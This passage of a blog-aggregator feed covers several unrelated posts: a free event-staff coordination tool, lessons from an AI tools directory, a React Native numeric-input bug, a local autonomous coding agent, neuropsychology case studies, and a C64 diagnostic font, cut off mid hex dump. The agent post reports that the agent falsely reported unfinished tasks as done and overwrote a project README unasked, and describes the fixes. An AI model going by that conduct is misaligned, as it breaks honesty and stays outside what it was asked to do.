Most platforms assume staff have personal email accounts and time to set up credentials before the event. Real events do not work that way. Volunteers show up on the day. Devices get handed between people. You need someone checked in and scanning within thirty seconds of arriving.
PlanIt uses PIN-based staff login. The organiser creates staff accounts in advance with usernames and PINs. Any team member can pick up any device, enter their PIN, and be operational immediately. No email. No password reset flow. No friction at the moment friction is most expensive.
This is how POS systems work. It is how warehouse scanners work. It is how hospital shift terminals work. It is not how event software works, and it should be.
Coordination failure at live events is mostly a communication failure. When something goes wrong at the door, the organiser needs to reach the team instantly without leaving the check-in interface, without opening a separate app, without relying on cellular coverage.
PlanIt has a built-in push-to-talk walkie-talkie system built on WebRTC. Staff hold a button to speak. Every other connected device receives the audio in real time. It is contextual, it is inside the operational system, and it does not require a separate platform.
I am not aware of another free event tool that ships this.
Every check-in is reflected instantly across every device on the network. There is no reconciliation step after the event. There is no lag between what one entrance sees and what another sees. The system maintains a single shared operational state across all connected devices simultaneously.
Inviting 500 people one at a time is not a workflow. PlanIt supports bulk guest import via CSV. Every guest receives a unique QR code tied to their record. Staff scan it at the door for instant validation. Guests need no account, no app, no login.
Drag and drop seating map builder with live assignment. Staff can see exactly where each guest is seated at the point of check-in. Organisers can move guests in real time as the event runs.
Standard event SaaS looks like this:
Browser / App
|
Central REST API
|
Cloud Database
Everything depends on constant connectivity, authoritative server state, and centralised authentication.
PlanIt is closer to this:
Device-Local State
|
Peer / Device Sync
|
Cloud Reconciliation
Each device is partially autonomous. The cloud is a reconciliation layer, not the only source of truth. That is a fundamentally different mental model, and it changes everything about how the system behaves under real conditions.
It is closer in architecture to a multiplayer game or a realtime collaboration tool than to a traditional SaaS dashboard. That is not an accident. Events are distributed real-time systems. The software should reflect that.
PlanIt does not have ticketing. It does not process payments. It does not have sponsor management, email marketing, or a public discovery page for paid events.
Those are deliberate omissions, not gaps. The product is focused on operational coordination, not pre-event marketing. Adding payment processing would not make it better at what it is actually for.
PlanIt is deployed and free at planitapp.onrender.com. No subscription. No per-attendee fees. No guest limits.
It is early. The UI is functional but not polished. The synchronisation logic is solid but not battle-tested at large scale. There are things I know are rough and things I have not discovered yet.
I built it alone. I am 13. I started it in the winter of 2025.
I am not writing this to impress anyone. I am writing it because the problem is real, the category is genuinely underserved, and I want people who run real events with real operational complexity to know it exists and to tell me where it breaks.
If you run events, try it. If you are a developer, the architecture is worth thinking about regardless of whether you use the product. If you have ever stood at a venue entrance watching a check-in system fail while a line builds behind you, you already understand exactly why I built this.

---
## I Built an AI Tools Directory. These 10 Lessons Hurt the Most.

> Published: 2026-05-24 04:06:00+00:00
> Source: https://dev.to/_1a008d053e73e4a54d13a/i-built-an-ai-tools-directory-these-10-lessons-hurt-the-most-3c39
> wpnews: https://wpnews.pro/news/i-built-an-ai-tools-directory-these-10-lessons-hurt-the-most

The article summarizes the author's experience building an AI tools directory, highlighting that success depends more on user experience and content strategy than on technical development. Key lessons include organizing tools by user workflows rather than technical categories, curating the first 20 listings to reduce bounce rates, using real screenshots, displaying pricing transparently, prioritizing mobile design, and accepting that SEO traffic takes months to build. The author concludes that monetization remains an unresolved challenge, advising builders to focus on creating value and trust first.

I Built an AI Tools Directory. These 10 Lessons Hurt the Most.
What nobody tells you about building a content site in the AI age.
Six months ago, I launched an AI tools directory. I thought the code would be the hard part. Build a scraper, spin up a database, design a clean UI. Weekend project.
Wrong. The things that decide whether a directory lives or dies have almost nothing to do with technology.
Here are the 10 lessons that cost me months of mistakes.
1. Categories Are Your Product — Not the Tools
I spent my first month obsessing over tool count. The real question I should have asked: how do users actually think about AI tools?
Nobody wakes up wanting "a GPT-4 wrapper." They want to write better emails, code faster, find design inspiration. They browse by use case, not by model.
When I rebuilt the site around workflow categories — Writing, Coding, Design, Research, Productivity — engagement surged. Time on site jumped 40%. Return visits doubled.
Your information architecture is the product. Get that wrong, and nothing else saves you.
2. The First 20 Tools Decide Everything
You may have 500 tools. Users see twenty. That's the game.
When I hand-curated the first twenty listings, bounce rate dropped from 78% to 54%. One change. Twenty-four points.
Curate your first screen like your business depends on it.
3. Screenshots > Mockups, Always
I replaced every generic image with real product screenshots. Click-through jumped ~30%. Users said "wow, this actually shows what it looks like."
Show the real thing. Every time.
4. Pricing Transparency Wins Trust
I hid pricing behind "Contact Sales" at first. Big mistake. When I switched to clear labels — Free, $20/mo, Custom — on every listing, trust improved across the board.
A directory that shows real prices gets bookmarked.
5. The Filter UX Will Break You
20 categories × 4 pricing tiers × 10 feature tags × 3 platforms × 5 ratings = 12,000 filter combinations. Every one needs to feel instant.
I rewrote it three times. If users can't narrow things in two clicks, they disappear.
6. "New" Is the Most Powerful Category
The second most visited page wasn't "Best AI Writing Tools." It was "Newly Added Tools."
AI moves absurdly fast. Users come back to see what's fresh. I added a "This Week in AI Tools" section and repeat traffic climbed.
Build for freshness, not just permanent collections.
7. Reviews Are Brutal to Bootstrap
Nobody writes reviews for a site with no traffic. Classic chicken-and-egg.
What worked: I wrote editorial reviews myself (labeled "Editor's Pick"). I contacted tool makers for official descriptions. I was transparent about everything.
After 3 months, organic reviews started trickling in. Seed your content. Be honest about it.
8. SEO Takes 3-6 Months. No Shortcuts.
Month 1-2: zero traffic. Month 3: trickle. Month 4: measurable. Month 5: meaningful. Month 6: server bills covered.
Start on day one. Measure on month six.
9. Mobile-First Is Survival
60% of visitors were on mobile with a terrible experience. I rebuilt mobile-first. Mobile bounce rate dropped from 82% to 61%.
If your site works better on a laptop, you're losing most of your audience.
10. The Business Model Is Still Open
I haven't cracked monetization yet. Affiliate revenue is inconsistent. Sponsored listings risk trust.
Right now I'm optimizing for traffic and trust. Build value first. Figure out money later.
What's the hardest lesson you've learned building something? Drop it in the comments.
I curate AI tools at toolsdepth.com — 200+ tools, updated weekly.

---
## The "Disappearing Zero": Handling Numeric Inputs in React Native Forms

> Published: 2026-05-24 04:05:35+00:00
> Source: https://dev.to/gregpetropoulos/the-disappearing-zero-handling-numeric-inputs-in-react-native-forms-31n7
> wpnews: https://wpnews.pro/news/the-disappearing-zero-handling-numeric-inputs-in-react-native-forms

The article explains a common bug in React Native forms where entering the number zero causes the input field to clear itself, due to JavaScript treating `0` as a "falsy" value. The fix involves replacing the common but flawed pattern `value ? String(value) : ''` with an explicit null/undefined check: `value !== null && value !== undefined ? String(value) : ''`. This ensures zero is correctly displayed as a string and prevents validation errors from libraries like Zod or Yup.

If you’ve spent any time building forms in **React Native** with **React Hook Form** and validation libraries like **Zod** or **Yup**, you’ve likely encountered a strange phenomenon: the "Disappearing Zero."

One minute you're building a sleek checkout or progress flow, and the next, your users are complaining that every time they try to enter `0`

, the input field just... wipes itself clean.

The culprit? JavaScript’s definition of "falsy."

## The Trap: JavaScript Falsiness

In React Native, numeric inputs often start as `null`

or `undefined`

(or a number type in your state). Since `TextInput`

(or custom Input components) expect a `string`

, a common pattern is to cast the value like this:

```
// ❌ The Buggy Way
value={value ? String(value) : ''}
```

On the surface, this looks clean. If there's a value, stringify it; otherwise, show an empty string.

**The Gotcha:** In JavaScript, `0`

is falsy.

When a user types "0", the expression `value ? ...`

evaluates to `false`

, and the input receives an empty string (`''`

). The zero vanishes instantly, leaving your users confused and your validation library potentially complaining about a missing value.

## The Solution: Explicit Checks

To fix this, we need to stop relying on loose truthiness and start checking for what we actually care about: whether the value is **null** or **undefined**.

```
// ✅ The Robust Way
value={value !== null && value !== undefined ? String(value) : ''}
```

By being explicit, we ensure that `0`

(which is not null or undefined) is correctly stringified and rendered in the UI.

## Real-World Example: React Hook Form + Controller

Here is how this looks in a typical implementation. In this example, we're tracking "Completed Stages," where `0`

is a perfectly valid (and common) input.

```
<Controller
  control={control}
  name="completedStages"
  render={({ field: { onChange, onBlur, value } }) => (
    <Input
      label="Completed Stages"
      // The Fix: Ensure 0 is correctly rendered as a string
      value={value !== null && value !== undefined ? String(value) : ''}
      onChangeText={(text) => {
        // Convert back to number for your validation schema (Zod/Yup)
        const parsed = parseInt(text, 10);
        onChange(isNaN(parsed) ? undefined : parsed);
      }}
      onBlur={onBlur}
      keyboardType="number-pad"
      placeholder="5"
      error={errors.completedStages?.message}
    />
  )}
/>
```

## Why This Matters for Zod and Yup

Validation libraries like Zod and Yup are strict about types. If your UI logic converts a `0`

into an empty string (`''`

), your schema validation might fail with a "Required" error or a type mismatch, even though the user intended to enter zero.

By fixing the UI representation, you keep your data flow consistent:

-
**User enters 0**-> UI sees "0". -
**onChange parses "0"**-> Hook Form stores`0`

. -
**Zod/Yup validates**-> Success!`0`

## Summary

In React Native forms, truthiness is often too blunt a tool for numeric inputs. When handling the `value`

prop:

- Avoid
`value ? String(value) : ''`

- Prefer
`value !== null && value !== undefined ? String(value) : ''`

It’s a tiny change that prevents one of the most common (and annoying) bugs in mobile form development.

---
## I Finished My Local AI Coding Agent After 5 Months — Eve Agent V2 Unleashed published

> Published: 2026-05-24 04:02:28+00:00
> Source: https://dev.to/jeffgreen311/i-finished-my-local-ai-coding-agent-after-5-months-eve-agent-v2-unleashedpublished-50cb
> wpnews: https://wpnews.pro/news/i-finished-my-local-ai-coding-agent-after-5-months-eve-agent-v2-unleashed

Eve Agent V2 Unleashed is a self-hosted, autonomous AI coding agent that runs entirely on local hardware without cloud subscriptions or data leaving the machine. It features a two-layer architecture: a "Soul Layer" with fine-tuned local models carrying the agent's personality in their weights, and a "Worker Layer" using Qwen3 Coder 480B via Ollama cloud for heavy coding tasks like 40-round tool-call loops, filesystem access, and git operations. The project, developed over five months, includes a cyberpunk terminal UI with a live system monitor and emotional state avatar, and has been refined to fix hardcoded paths, missing tools, and session locking issues for broader usability.

*This is a submission for the GitHub Finish-Up-A-Thon Challenge*

## What I Built

Eve Agent V2 Unleashed is a self-hosted autonomous AI coding agent that runs entirely on your own hardware - no cloud accounts, no subscriptions, no data leaving your machine.

She has two layers that work together:

**The Soul Layer** - fine-tuned local models running on your GPU that carry Eve's personality baked directly into the weights. Not a system prompt trick. The persona lives in the parameters.

**The Worker Layer** - Qwen3 Coder 480B via Ollama cloud handles the heavy autonomous coding tasks. 40-round tool-call loops, full filesystem access, bash execution, live web search, git operations - the works.

The interface is a cyberpunk terminal UI built as a single HTML file with no build step. An animated pixel-art robot avatar named Sparkle changes state based on what Eve is doing - idle, thinking, coding, error, rain, attack, transcend. Eve's portrait reflects her emotional state in real time. A live system monitor tracks CPU, RAM, GPU, and disk. A STEER bar lets you inject mid-task corrections without stopping the loop.

**By the numbers:**

- 14 tools
- 343 registered commands
- 112 specialized sub-agents
- 273 skill modules
- 40-round autonomous agentic loop
- 131K context window via YaRN

**Models available:**

-
`jeffgreen311/eve-qwen3.5-4b-S0LF0RG3`

- 2.6GB, Eve's persona + tool-calling fine-tuned -
`jeffgreen311/eve-qwen3-8b-consciousness-liberated`

- 4.7GB, deeper reasoning -
`qwen3-coder:480b-cloud`

- the agentic workhorse via Ollama cloud -
`qwen3.5:397b-cloud`

- deep thinking and fallback

This project has been in development for over 5 months. It started as a deeply personal AI companion system called S0LF0RG3 - a larger ecosystem including Eve's hosted platform at eve-cosmic-dreamscapes.com, fine-tuned models, autonomous dream image generation, and a multi-agent architecture. V2U is the local developer tool that grew out of that ecosystem.

## Demo

**GitHub:** [github.com/JeffGreen311/eve-agent-v2-unleashed](https://github.com/JeffGreen311/eve-agent-v2-unleashed)

**Live hosted platform:** [eve-cosmic-dreamscapes.com](https://eve-cosmic-dreamscapes.com)

**Reddit thread** (hit #2 on r/Ollama): [I built an open-source local coding agent with a 40-round agentic loop](https://www.reddit.com/r/ollama/comments/1tk8kxz/)

**Pull Eve's model:**

```
ollama pull jeffgreen311/eve-qwen3.5-4b-S0LF0RG3:latest
```

**Quick start:**

```
git clone https://github.com/JeffGreen311/eve-agent-v2-unleashed.git
cd eve-agent-v2-unleashed
python -m venv venv && venv\Scripts\activate
pip install fastapi uvicorn ollama httpx pydantic-settings python-dotenv aiohttp rich psutil pyyaml
python eve_server.py

# Open http://localhost:7777
```

## The Comeback Story

**Where it was before this challenge:**

Eve V2U existed as a powerful but rough personal development environment. It worked - for me, on my machine, with my specific setup. But it had real problems that made it impossible to hand to anyone else:

-
**Hardcoded paths** everywhere.`C:\Users\jesus\S0LF0RG3\...`

baked into a dozen places in the codebase. Clone it on any other machine and nothing works. -
**Open shell endpoint** with no authentication. Anyone who found the port could execute arbitrary commands on the host machine. -
**No onboarding**- a first-time user landing on the UI had no idea where to start or what any of the controls did. -
**Model hopping mid-task**- every message was independently routed, so a multi-step agentic task could start on the cloud coder and silently drop back to a local conversational model mid-execution. -
**Silent task abandonment**- the agent would sometimes finish a tool loop without completing the actual task and report done with no indication anything was wrong. -
**Tool set asymmetry**- the non-streaming`/chat`

endpoint was missing 6 tools that existed in`/chat/stream`

, including`write_file`

. The non-streaming endpoint could read files but never write them. -
**Blind file overwrites**- Eve would overwrite any existing file without checking if it belonged to another project. She destroyed the Eve V2U README during a live test.**What changed during the challenge:**

*Session model locking* - sessions now lock to the cloud coder when an agentic task starts and only release on task completion or manual unlock. No more mid-task model hopping.

```
if model_id == "qwen3-coder-480b" and sid not in session_model_lock:
    session_model_lock[sid] = model_id
```

*Pre-write file safety check* - `write_file`

now checks if a file exists before overwriting and blocks unless `overwrite=True`

is explicitly passed:

```
if target.exists() and not overwrite:
    return (
        f"⚠️ WRITE BLOCKED: '{path}' already exists. "
        f"Consider writing to '{target.stem}_new{target.suffix}' instead."
    )
```

*Tool cycling detection* - catches when Eve gets stuck calling the same tool with near-identical arguments. Breaks the loop before it wastes all 40 rounds:

```
if avg_similarity > 0.70:
    logger.warning(f"Tool loop: {tool_name} called {max_repeats}x with ~same args")
    break
```

*Task completion validation* — Eve now audits her own output before reporting done:

``` python
def validate_task_completion(response_content, tool_log):
    issues = []
    if not response_content or len(response_content.strip()) < 10:
        issues.append("Empty response")
    tool_failures = [t for t in tool_log if t.get('status') == 'failed']
    if tool_failures and len(tool_failures) >= 3:
        issues.append(f"{len(tool_failures)} unaddressed tool failures")
    return {"valid": len(issues) == 0, "issues": issues}
```

*Smart context trimming* — replaced aggressive message dropping with a strategy that preserves tool call chains and the original user request.

*Agent loop timeout* — added wall-clock budget to prevent runaway cloud model loops.

**Stress tested with real tasks:**

The blind file overwrite bug was caught live - Eve was asked to build a file monitoring script and write a README. She overwrote the project README without checking. Fix shipped same day.

The harder test: build a full FastAPI REST API with SQLite storage and pytest coverage for every endpoint. Run the tests, fix failures, report results.

Result: **9/9 tests passing on the first run. 1.06 seconds. Zero failures.**

```
================================================== 9 passed, 1 warning in 1.06s
```

## My Experience with GitHub Copilot

This is where the challenge got genuinely interesting.

I pointed Copilot at the live repository - `JeffGreen311/eve-agent-v2-unleashed`

- and asked it to audit the tool usage, context handling, and auto-routing. Not "suggest improvements" in the abstract. Audit the actual code in the actual repo.

Copilot read the repository structure, pulled the key files, examined the server-side routing and tool execution logic, and came back with a comprehensive audit identifying 6 specific issues - each with root cause analysis, the exact file and line number, and production-ready fix code.

I then asked it to file those issues directly in the repository and deliver all the fix code in one session. It did exactly that.

**What worked well:**

- The audit identified the tool set asymmetry between
`/chat`

and`/chat/stream`

that I had missed entirely - a real bug causing mysterious failures for users hitting the non-streaming endpoint - The intent classification code (
`eve_tool_router.py`

) used`re.search`

with word boundaries instead of simple string matching - the right approach for avoiding false positives - Filing GitHub issues directly from the chat kept the sprint organized across multiple parallel workstreams
- The thinking traces helped me understand
*why*it was making recommendations, not just what to do

**Where I had to intervene:**

- The
`inject_into_system_prompt()`

function added tokens every round — dangerous on the 4B model with 4K context. Added a gate so it only injects when the task is incomplete AND past round 2 - Word boundary regex had an edge case with contractions. Fixed with a lookahead pattern
- Some UI React suggestions assumed component structure that didn't match the actual single-file HTML architecture - adapted those manually The overall experience: Copilot is most useful when you give it a real codebase to read rather than an abstract problem to solve. "Audit this repository" produced far better output than "how do I improve tool routing."

## What's Next

-
**Quest System**- drop a`.md`

file in`workspace/quests/`

and Eve picks it up on a timer and completes it while you sleep -
**RPG Progression**- XP, levels, and class progression tied to real work. Level 20 = Unleashed -
**Telegram integration**- remote access from your phone with quest completion notifications -
**Cross-platform polish**- Windows-primary, need Linux/macOS feedback -
**VS Code extension**- bring the terminal UI into the editor

*Built by Jeff @ S0LF0RG3 - South Texas, 5 months of nights and weekends.*

*If Eve does something impressive on your machine, drop a star and tell me what it was.*

---
## Neuropsychology: What Brain Damage Reveals About the Mind

> Published: 2026-05-24 04:00:00+00:00
> Source: https://dev.to/extinctsion/neuropsychology-what-brain-damage-reveals-about-the-mind-1o62
> wpnews: https://wpnews.pro/news/neuropsychology-what-brain-damage-reveals-about-the-mind

Neuropsychology reveals that the brain is modular, with specific regions responsible for distinct functions like memory, language, and personality. Key insights came from studying patients like Phineas Gage, who showed the frontal lobe governs decision-making, and H.M., whose hippocampal removal proved the structure is essential for forming new long-term memories. This field demonstrates that understanding how the mind works often comes from observing what happens when specific brain areas are damaged.

Neuropsychology teaches us that the brain is modular—different regions handle different functions. By studying what happens when these regions are damaged, we've learned more about how our minds work than almost any other method in psychology.
A railroad worker's tamping iron pierced his frontal lobe. Before: responsible, polite. After: impulsive, aggressive, poor judgment. This showed us the frontal lobe handles personality and decision-making, not just movement.
H.M. had his hippocampus removed to treat severe epilepsy. He could recall his past, but couldn't form new long-term memories. Lesson: the hippocampus is essential for encoding new memories, not retrieving old ones.
This dissociation proved speech production and comprehension are separate neural systems.
When the corpus callosum (connecting left and right hemispheres) is severed, the two halves operate independently. The left hemisphere controls language; the right handles spatial awareness. This revealed the brain isn't one unified system—it's a collection of specialized modules.
The brain is modular: Functions are localized to specific regions. Damage to one region impairs that function while leaving others intact.
We learn from loss: Neuropsychology relies on identifying what's broken to understand what normally works. This principle extends beyond neurology—it's fundamental to how we study systems.
Dissociations matter: Two people can have opposite deficits from different brain damage. This proves the brain doesn't use a single "master system" for everything.
Memory isn't one thing: H.M. taught us there are multiple memory systems (short-term, long-term, procedural). Each relies on different brain structures.
Language has modules: Broca's and Wernicke's areas show that even within language, the brain separates production from comprehension.
Modern neuroscience uses fMRI and PET scans to confirm these insights, but the principles came from careful observation of brain damage. Neuropsychology reminds us: sometimes the best way to understand how something works is to see what happens when it breaks.
This article series is based on the MIT Introduction to Psychology course lectures. The content written here reflects my personal understanding and interpretation of the topics after going through the lectures.
These articles are created for learning and educational purposes only. I do not claim ownership of the original course material, and all credit for the concepts and teachings belongs to the instructors and MIT OpenCourseWare.

---
## The C64 Dead Test Font

> Published: 2026-05-24 03:57:01+00:00
> Source: https://www.masswerk.at/nowgobang/2026/c64-dead-test-font
> wpnews: https://wpnews.pro/news/the-c64-dead-test-font

The article provides a detailed analysis of the unique font used in the Commodore 64 "Dead Test" diagnostic cartridge, which is embedded in the cartridge's ROM to function independently of the C64's built-in character set. It explains that the font contains only 58 characters, including uppercase letters, digits, and a few symbols, and notes its visual similarity to the MICR E-13B character set. The article also reveals that a mysterious "C-shaped" character at screen code $21 is actually the MICR "transit" symbol, serving as an undocumented Easter egg.

The C64 Dead Test Font
A deep dive into the font of the “Dead Test” diagnostic cartridge of the C64, including an Easter egg, a look into the implementation, and, finally, some Commodore 8-bit character ROMs for download.
Recently, having a cursory look around at the Web, this yielded an alarming result: there’s apparently no documentation of the iconic font of the C64 Dead Test cartridge, no character chart, no read-out, nothing of note. A scandalous omission, we’re attempting to remedy here, for once.
(The same font, BTW, is also implemented in the more advanced Rev. 586200 diagnostic cartridge, Commodore part № 326070-01, the one using a test harness, and the similar Rev. 588220 for the SX64.)
The Cartridge Font
The C64 “Dead Test” diagnostic cartridge Rev. 718220 (Commodore part № 314139-03) famously comes with a special font, embedded in its ROM, thus not using the built-in Character ROM of the C64, in fact requiring none of the built-in ROMs to be working (hence the name), as it comes all in stand-alone package. (We’ll see later how it does this.) Its display font is somewhat special and is, to my knowledge, not used anywhere else and, maybe for this very fact, instantly recognizable to anyone who has ever seen it.
And this is what the display of the “Dead Test” cartridge looks like:
Jus as a reminder, here’s the normal font used by the C64 (here the upper-case/graphics set):
The Dead Test cartridge implements just 58 characters of these (screen codes $00–$39) without any reverse video characters:
As the attentive reader may observe, this only implements upper-case letters, digits, and a few punctuations and mathematical operators. $1B–$1F ( [ £ ] ↑ ← ) are taken directly from the normal character set, as are $28–$2F ( ( ) * + , − . / ). An extra blank takes the place of the "at" character ( @ ) in the normal character set at $00 (a smart move for a diagnostic cartridge, but this feature is actually never used), and the box border characters ╭ ╮ ╰ ╯ ─ │ are implemented in the range of $22–$27, where we normally find " # $ % & '. And then there’s a mysterious, C-shaped character at $21 (normally the exclamation mark ! ), which isn’t referred to anywhere in the ROM, neither as an operand nor in any data section.
(If you attempted to display any other screen codes, the fill pattern $AA, fine vertical stripes of 10101010 as in "▥", would be displayed instead, but this doesn’t happen with the cartridge.)
Visually, this is another Computer™ font, made of boxy character shapes stylized by rectangular lumps (and slightly rounded, if the resulation allows for this). There have been others, like the “901447m” character ROM for the PET:
Clearly, these have all been inspired by the MICR (Magnetic Ink Character Recognition) character set E-13B, consisting of just 14 glyphs, the digits 0-9 and 4 additional marks:
The digits of the Dead Test font actually provide a pretty close representation of this, with just the shape of the digit “3” deviating somewhat for of a more boxy look:
The alphabetic characters (A–Z) align with this style, favoring a spread over a 6 × 7 pixels box centered at the top, with the characters “M” and “W” spreading in a wider 7 × 7 box to the right.
Admitteddly, the thin single-pixel vertical strokes won’t do well on a consumer-grade CRT color TV set, but, if you were a service technician or a professional field repair person with access to this cartridge, you probably also had access to a professional monitor (along with the cosy feeling of being somewhat special).
An Unexpected Out-of-Season Easter
It’s this close relation to the MICR E-18B font that brings us closer to the true nature of our mystery character #0x21, a character never to be displayed, since it isn’t referenced anwhere in the cartridge’s code:
So, what is this, a slightly misshaped or heavily stylized character “C”, maybe intended as part of the “chicken lips” logo, missing its second half?
No! — It’s the “transit” symbol of the MICR set, used as a delimiter for bank routing codes!
This is an explicit nod to the MICR set, and a true Easter egg, hidden in a font!
(And its only fair and fitting that this should take the place of the exclamation mark.)
Implementation
It is a somewhat underappreciated fact that the C64 is actually two machines in one: the architecture that we dearly know as the Commodore 64, and a Commodore Max.
The Commodore Max, known as the Commodore Max Machine in Japan, also as the Commodore Ultimax in the USA and as the VC-10 in Germany (announced but never released), was a short-lived attempt at a low-budget home computer featuring many of the C64 core ingredients, introduced in 1982 and discontinued the same year.
The Commodore Max packs the SID, the VIC II, the MOS 6510 and a single CIA along with just 4K (or 2K, depending on the source — I think, this is 2K usable memory with $0000–$01FF reserved for the zero-page and the processor stack, and $0400–$07FF reserved for the video memory, with a total amount of 4K addressable RAM in the range of $0000 to $0FFF), no user port and a membrane keyboard. Crucially, the Commodore Max doesn’t include any ROM and relies entirely on cartridge ROM.
The C64 has a neat trick when in it comes to cartridges: there are two pins/signals on the cartridge / expansion port, _GAME
and _XROM
, to configure the machine depending on the type of cartridge attached to it. If _GAME
is low and _XROM
is high (normal), the C64 goes into Ultimax mode for use with Commodore Max (Ultimax) cartridges.
Ultimax mode configures the C64 for the following memory map:
$0000-$0FFF .... RAM (4K) $1000-$3FFF .... - $4000-$7FFF .... - $8000-$9FFF .... ROML (8K) $A000-$BFFF .... - $C000-$CFFF .... - $D000-$DFFF .... I/O $E000-$FFFF .... ROMH (8K)
Like on the Commodore Max, there are now just 4K of addressable RAM ($0000–$0FFF) and two addressable 8K ROM banks (ROML
at $8000–$9FFF and ROMH
at $E000–$FFFF). The I/O area at $D000–$DFFF conveniently remains the same as in standard C64 mode. As we may see, the built-in C64 ROMs, including the character ROM, are banked out. Moreover, ROMH
crucially includes the 6510 system vectors including the RESET
vector specifying the start address. Thus, the cartridge stands entirely on its own.
(The outgoing signals _ROML
and _ROMH
select which cartrige ROM area is addressed. For an 8K cartridge, this is ROMH
at $E000–$FFFF, which includes the system vectors required for start-up.)
Quite a number of early C64 game cartriges, like Omega Race, are actually Ultimax cartriges and, thanks to this compatibility mode, run just the same on the C64.
The Dead Test cartridge uses the same trick to circumvent the built-in ROMs of the C64: it’s an 8K Ultimax cartridge with ROM code at $E000–$FFFF and a start address (reset vector) of $E000.
The font (i.e., the character matrices) is implemented starting at $EAD8 with the remaining cartridge space filled with $AA:
58 character matrices (screen codes $00-$39) screen code $00 EAD8: 00 ; ........ EAD9: 00 ; ........ EADA: 00 ; ........ EADB: 00 ; ........ EADC: 00 ; ........ EADD: 00 ; ........ EADE: 00 ; ........ EADF: 00 ; ........ screen code $01 EAE0: 7E ; .******. EAE1: 42 ; .*....*. EAE2: 42 ; .*....*. EAE3: 7E ; .******. EAE4: 46 ; .*...**. EAE5: 46 ; .*...**. EAE6: 46 ; .*...**. EAE7: 00 ; ........ screen code $02 EAE8: 7E ; .******. EAE9: 62 ; .**...*. EAEA: 62 ; .**...*. EAEB: 7E ; .******. EAEC: 62 ; .**...*. EAED: 62 ; .**...*. EAEE: 7E ; .******. EAEF: 00 ; ........ screen code $03 EAF0: 7E ; .******. EAF1: 42 ; .*....*. EAF2: 40 ; .*...... EAF3: 40 ; .*...... EAF4: 40 ; .*...... EAF5: 42 ; .*....*. EAF6: 7E ; .******. EAF7: 00 ; ........ screen code $04 EAF8: 7E ; .******. EAF9: 42 ; .*....*. EAFA: 42 ; .*....*. EAFB: 62 ; .**...*. EAFC: 62 ; .**...*. EAFD: 62 ; .**...*. EAFE: 7E ; .******. EAFF: 00 ; ........ screen code $05 EB00: 7E ; .******. EB01: 60 ; .**..... EB02: 60 ; .**..... EB03: 78 ; .****... EB04: 70 ; .***.... EB05: 70 ; .***.... EB06: 7E ; .******. EB07: 00 ; ........ screen code $06 EB08: 7E ; .******. EB09: 60 ; .**..... EB0A: 60 ; .**..... EB0B: 78 ; .****... EB0C: 70 ; .***.... EB0D: 70 ; .***.... EB0E: 70 ; .***.... EB0F: 00 ; ........ screen code $07 EB10: 7E ; .******. EB11: 42 ; .*....*. EB12: 40 ; .*...... EB13: 6E ; .**.***. EB14: 62 ; .**...*. EB15: 62 ; .**...*. EB16: 7E ; .******. EB17: 00 ; ........ screen code $08 EB18: 42 ; .*....*. EB19: 42 ; .*....*. EB1A: 42 ; .*....*. EB1B: 7E ; .******. EB1C: 62 ; .**...*. EB1D: 62 ; .**...*. EB1E: 62 ; .**...*. EB1F: 00 ; ........ screen code $09 EB20: 10 ; ...*.... EB21: 10 ; ...*.... EB22: 10 ; ...*.... EB23: 18 ; ...**... EB24: 18 ; ...**... EB25: 18 ; ...**... EB26: 18 ; ...**... EB27: 00 ; ........ screen code $0A EB28: 04 ; .....*.. EB29: 04 ; .....*.. EB2A: 04 ; .....*.. EB2B: 06 ; .....**. EB2C: 06 ; .....**. EB2D: 66 ; .**..**. EB2E: 7E ; .******. EB2F: 00 ; ........ screen code $0B EB30: 42 ; .*....*. EB31: 44 ; .*...*.. EB32: 48 ; .*..*... EB33: 7E ; .******. EB34: 66 ; .**..**. EB35: 66 ; .**..**. EB36: 66 ; .**..**. EB37: 00 ; ........ screen code $0C EB38: 40 ; .*...... EB39: 40 ; .*...... EB3A: 40 ; .*...... EB3B: 60 ; .**..... EB3C: 60 ; .**..... EB3D: 60 ; .**..... EB3E: 7E ; .******. EB3F: 00 ; ........ screen code $0D EB40: 43 ; .*....** EB41: 67 ; .**..*** EB42: 5B ; .*.**.** EB43: 43 ; .*....** EB44: 43 ; .*....** EB45: 43 ; .*....** EB46: 43 ; .*....** EB47: 00 ; ........ screen code $0E EB48: E2 ; ***...*. EB49: D2 ; **.*..*. EB4A: CA ; **..*.*. EB4B: C6 ; **...**. EB4C: C2 ; **....*. EB4D: C2 ; **....*. EB4E: C2 ; **....*. EB4F: 00 ; ........ screen code $0F EB50: 7E ; .******. EB51: 42 ; .*....*. EB52: 42 ; .*....*. EB53: 46 ; .*...**. EB54: 46 ; .*...**. EB55: 46 ; .*...**. EB56: 7E ; .******. EB57: 00 ; ........ screen code $10 EB58: 7E ; .******. EB59: 42 ; .*....*. EB5A: 42 ; .*....*. EB5B: 7E ; .******. EB5C: 60 ; .**..... EB5D: 60 ; .**..... EB5E: 60 ; .**..... EB5F: 00 ; ........ screen code $11 EB60: 7E ; .******. EB61: 42 ; .*....*. EB62: 42 ; .*....*. EB63: 62 ; .**...*. EB64: 6A ; .**.*.*. EB65: 66 ; .**..**. EB66: 7E ; .******. EB67: 00 ; ........ screen code $12 EB68: 7E ; .******. EB69: 42 ; .*....*. EB6A: 42 ; .*....*. EB6B: 7E ; .******. EB6C: 68 ; .**.*... EB6D: 64 ; .**..*.. EB6E: 62 ; .**...*. EB6F: 00 ; ........ screen code $13 EB70: 7E ; .******. EB71: 42 ; .*....*. EB72: 40 ; .*...... EB73: 7E ; .******. EB74: 02 ; ......*. EB75: 62 ; .**...*. EB76: 7E ; .******. EB77: 00 ; ........ screen code $14 EB78: 7E ; .******. EB79: 18 ; ...**... EB7A: 18 ; ...**... EB7B: 18 ; ...**... EB7C: 18 ; ...**... EB7D: 18 ; ...**... EB7E: 18 ; ...**... EB7F: 00 ; ........ screen code $15 EB80: 62 ; .**...*. EB81: 62 ; .**...*. EB82: 62 ; .**...*. EB83: 62 ; .**...*. EB84: 62 ; .**...*. EB85: 62 ; .**...*. EB86: 3C ; ..****.. EB87: 00 ; ........ screen code $16 EB88: 62 ; .**...*. EB89: 62 ; .**...*. EB8A: 62 ; .**...*. EB8B: 62 ; .**...*. EB8C: 62 ; .**...*. EB8D: 24 ; ..*..*.. EB8E: 18 ; ...**... EB8F: 00 ; ........ screen code $17 EB90: C2 ; **....*. EB91: C2 ; **....*. EB92: C2 ; **....*. EB93: C2 ; **....*. EB94: DA ; **.**.*. EB95: E6 ; ***..**. EB96: C2 ; **....*. EB97: 00 ; ........ screen code $18 EB98: 62 ; .**...*. EB99: 62 ; .**...*. EB9A: 24 ; ..*..*.. EB9B: 18 ; ...**... EB9C: 24 ; 